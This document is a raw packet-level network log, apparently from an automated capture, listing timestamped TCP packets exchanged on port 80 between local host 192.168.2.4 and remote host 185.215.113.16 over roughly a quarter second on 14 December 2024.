Dec 14, 2024 23:58:29.943804026 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.944667101 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.944708109 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.944780111 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.944824934 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.945696115 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.945744038 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.945816994 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.945862055 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.946734905 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.946784019 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.946856022 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.946902037 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.947763920 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.947810888 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.947890043 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.947937012 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.948820114 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.948865891 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.948930025 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.948975086 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.949827909 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.949873924 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.949947119 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.949991941 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.950900078 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.950946093 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.951019049 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.951065063 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.951898098 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.951945066 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.952009916 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.952054977 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.952910900 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.952956915 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.953033924 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.953079939 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.953963041 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.954010963 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.954086065 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.954130888 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.955020905 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.955065966 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.955173016 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.955218077 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.956031084 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.956077099 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.956140995 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.956192970 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.957073927 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.957120895 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.957185030 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.957230091 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.958086967 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.958132982 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.958193064 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.958236933 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.959130049 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.959175110 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.959234953 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.959280014 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.960159063 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.960206985 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.960266113 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.960309029 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.961201906 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.961250067 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.961308002 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.961359978 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.962218046 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.962258101 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.962388992 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.962434053 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.963265896 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.963310957 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.963403940 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.963454008 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.964320898 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.964365959 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.964432955 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.964479923 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.965342045 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.965392113 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.965461016 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.965506077 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.966366053 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.966412067 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.966480017 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.966526031 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.967442989 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.967490911 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.967540979 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.967585087 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.968456984 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.968513966 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.968575954 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.968621016 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.969500065 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.969547033 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.969598055 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.969649076 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.970499992 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.970545053 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.970618010 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.970664024 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.971524000 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.971570015 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.971651077 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.971695900 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.972573996 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.972620964 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.972664118 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.972712994 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.973593950 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.973642111 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.973712921 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.973759890 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.974653006 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.974699020 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.974806070 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.974852085 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.975677967 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.975728035 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.975961924 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.976007938 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.976696968 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.976743937 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.976818085 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.976862907 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.977739096 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.977793932 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.977865934 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.977910995 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.978775024 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.978820086 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.978893042 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.978936911 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.979805946 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.979855061 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.979921103 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.979964972 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.980817080 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.980865955 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.980938911 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.980983019 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.981862068 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.981911898 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.981969118 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.982012987 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.982886076 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.982932091 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.983007908 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.983052969 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.983932018 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.983978033 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.984050989 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.984096050 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.984935999 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.984987974 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.985100031 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.985141993 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.986041069 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.986087084 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.986135006 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.986179113 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.987034082 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.987082005 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.987154007 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.987200022 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.988090992 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.988151073 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.988193989 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.989105940 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.989173889 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.989233971 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.989322901 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.990125895 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.990179062 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.990238905 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.990293980 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:29.991118908 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:29.991166115 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.129451990 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.129517078 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.129935980 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.130006075 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.130095005 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.130881071 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.131027937 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.131081104 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.131899118 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.131953955 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.132033110 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.132941008 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.133007050 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.133074999 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.133140087 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.133971930 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.134109020 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.134169102 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.135054111 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.135221958 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.135279894 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.136049032 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.136123896 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.136154890 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.136276960 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.137083054 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.137198925 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.137260914 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.138118982 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.138231039 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.138390064 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.139178038 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.139244080 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.139295101 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.139487982 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.140189886 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.140305042 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.140362978 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.141256094 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.141349077 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.141411066 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.142247915 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.142420053 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.142478943 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.143377066 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.143445015 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.143510103 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.144299984 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.144476891 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.145358086 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.145421982 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.145479918 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.145545006 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.146370888 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.146502972 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.146740913 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.147454977 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.147522926 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.147727966 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.147777081 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.148480892 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.148572922 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.148631096 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.149471998 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.149617910 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.150517941 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.150573969 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.150669098 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.151559114 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.151614904 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.151668072 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.151843071 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.152571917 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.152628899 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.152698040 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.153148890 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.153631926 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.153808117 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.154185057 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.154638052 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.154692888 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.154778004 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.154825926 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.155674934 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.155908108 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.155971050 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.156703949 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.156770945 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.156856060 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.157061100 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.157748938 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.157891989 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.158801079 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.158862114 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.158921957 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.159873009 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.159940004 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.160015106 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.160868883 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.161026001 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.161087990 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.161886930 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.162005901 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.162904024 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.162980080 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.163049936 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.163980961 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.164074898 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.164143085 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.164968967 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.165102959 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.165167093 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.166069984 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.166135073 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.166203022 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.166249990 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.167053938 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.167166948 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.167207003 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.167407990 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.168081999 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.168131113 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.168199062 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.168409109 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.169121981 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.169233084 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.169287920 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.170149088 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.170280933 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.170289040 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.170330048 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.171159029 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.171344995 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.171405077 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.172199011 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.172255039 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.172334909 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.173140049 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.173259974 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.173379898 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.173435926 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.174295902 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.174345016 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.174407005 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.175399065 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.175645113 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.175714016 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.176318884 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.176465034 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.177376032 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.177434921 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.177503109 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.178375006 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.178457022 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.178544044 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.178597927 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.179464102 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.179594040 CET	80	49813	185.215.113.16	192.168.2.4
